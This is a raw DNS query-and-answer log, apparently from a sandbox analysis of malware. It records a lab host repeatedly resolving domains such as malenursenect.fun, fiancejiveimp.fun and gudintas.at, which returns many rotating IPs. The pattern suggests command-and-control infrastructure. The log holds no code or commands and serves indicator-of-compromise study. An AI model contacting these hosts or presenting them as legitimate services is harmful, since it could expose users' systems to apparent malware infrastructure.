                                                                                                        Oct 3, 2023 18:02:52.953775883 CEST192.168.2.38.8.8.80xe8c3Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.733108044 CEST192.168.2.38.8.8.80x30beStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:53.805510998 CEST192.168.2.38.8.8.80x7019Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.278919935 CEST192.168.2.38.8.8.80xedceStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.830756903 CEST192.168.2.38.8.8.80xcc91Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:54.856241941 CEST192.168.2.38.8.8.80x51efStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.414472103 CEST192.168.2.38.8.8.80x1e1eStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.415195942 CEST192.168.2.38.8.8.80xb8c5Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:55.928056955 CEST192.168.2.38.8.8.80xb58aStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.123781919 CEST192.168.2.38.8.8.80x6d9dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.537497044 CEST192.168.2.38.8.8.80xa295Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:56.662497044 CEST192.168.2.38.8.8.80x310cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.146254063 CEST192.168.2.38.8.8.80x52b6Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:57.756023884 CEST192.168.2.38.8.8.80x6ecaStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.202155113 CEST192.168.2.38.8.8.80xa54dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.348805904 CEST192.168.2.38.8.8.80x99b9Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.856096029 CEST192.168.2.38.8.8.80xe9d0Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:58.969285965 CEST192.168.2.38.8.8.80xe1ddStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.426625967 CEST192.168.2.38.8.8.80x352bStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:59.590012074 CEST192.168.2.38.8.8.80xfbedStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:00.216002941 CEST192.168.2.38.8.8.80x9befStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:01.410975933 CEST192.168.2.38.8.8.80x7bd9Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:01.970621109 CEST192.168.2.38.8.8.80xa63fStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:04.584605932 CEST192.168.2.38.8.8.80x9d4dStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.240778923 CEST192.168.2.38.8.8.80xa85fStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.704818964 CEST192.168.2.38.8.8.80x72f0Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:05.799854040 CEST192.168.2.38.8.8.80x9eebStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.242111921 CEST192.168.2.38.8.8.80x71c3Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.335071087 CEST192.168.2.38.8.8.80x651dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.793595076 CEST192.168.2.38.8.8.80xb33fStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:06.927793980 CEST192.168.2.38.8.8.80x3a6dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.466041088 CEST192.168.2.38.8.8.80xcdf4Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:07.565373898 CEST192.168.2.38.8.8.80x31a3Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.021378994 CEST192.168.2.38.8.8.80x2febStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.176949978 CEST192.168.2.38.8.8.80xafcbStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.782617092 CEST192.168.2.38.8.8.80x3baStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:08.889151096 CEST192.168.2.38.8.8.80xe7fStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:09.380963087 CEST192.168.2.38.8.8.80xd4bbStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:10.378102064 CEST192.168.2.38.8.8.80x9b9fStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:10.964281082 CEST192.168.2.38.8.8.80xe659Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:14.537038088 CEST192.168.2.38.8.8.80x2dd0Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.122534990 CEST192.168.2.38.8.8.80x6c7cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.703057051 CEST192.168.2.38.8.8.80xf230Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.271769047 CEST192.168.2.38.8.8.80xf3a1Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.823379993 CEST192.168.2.38.8.8.80xc908Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:17.379071951 CEST192.168.2.38.8.8.80xde8cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:17.921377897 CEST192.168.2.38.8.8.80x790dStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:18.786281109 CEST192.168.2.38.8.8.80xb15cStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.768801928 CEST192.168.2.38.8.8.80xe6beStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.861069918 CEST192.168.2.38.8.8.80xe2eaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:06.899744987 CEST192.168.2.38.8.8.80x799fStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.339785099 CEST192.168.2.38.8.8.80xaa93Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.842005968 CEST192.168.2.38.8.8.80x5b40Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.507364035 CEST192.168.2.38.8.8.80x4393Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.098458052 CEST192.168.2.38.8.8.80x87dfStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.293589115 CEST192.168.2.38.8.8.80xe990Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.065207958 CEST192.168.2.38.8.8.80x7cbeStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.102982998 CEST192.168.2.38.8.8.80xe399Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.306070089 CEST192.168.2.38.8.8.80xf736Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.142764091 CEST192.168.2.38.8.8.80xbaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.282331944 CEST192.168.2.38.8.8.80xf117Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.045187950 CEST192.168.2.38.8.8.80xcf23Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:03.900516987 CEST192.168.2.38.8.8.80x86efStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:07.870399952 CEST192.168.2.38.8.8.80x97aeStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:12.735975027 CEST192.168.2.38.8.8.80x63bStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:14.289756060 CEST192.168.2.38.8.8.80x8a9dStandard query (0)pik96.ruA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:14.761032104 CEST192.168.2.38.8.8.80x51a7Standard query (0)rosatiauto.comA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:15.381403923 CEST192.168.2.38.8.8.80x63a0Standard query (0)kingpirate.ruA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST8.8.8.8192.168.2.30xeb10No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST8.8.8.8192.168.2.30x731bNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST8.8.8.8192.168.2.30x21eaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST8.8.8.8192.168.2.30xce21No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST8.8.8.8192.168.2.30x5c49No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST8.8.8.8192.168.2.30xae94No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST8.8.8.8192.168.2.30x4afcNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST8.8.8.8192.168.2.30xe81cNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST8.8.8.8192.168.2.30x448eNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST8.8.8.8192.168.2.30x5539No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST8.8.8.8192.168.2.30xb9e5No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:37.087529898 CEST8.8.8.8192.168.2.30x85e9No error (0)h170811.srv22.test-hf.su91.227.16.22A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST8.8.8.8192.168.2.30xe0b2No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
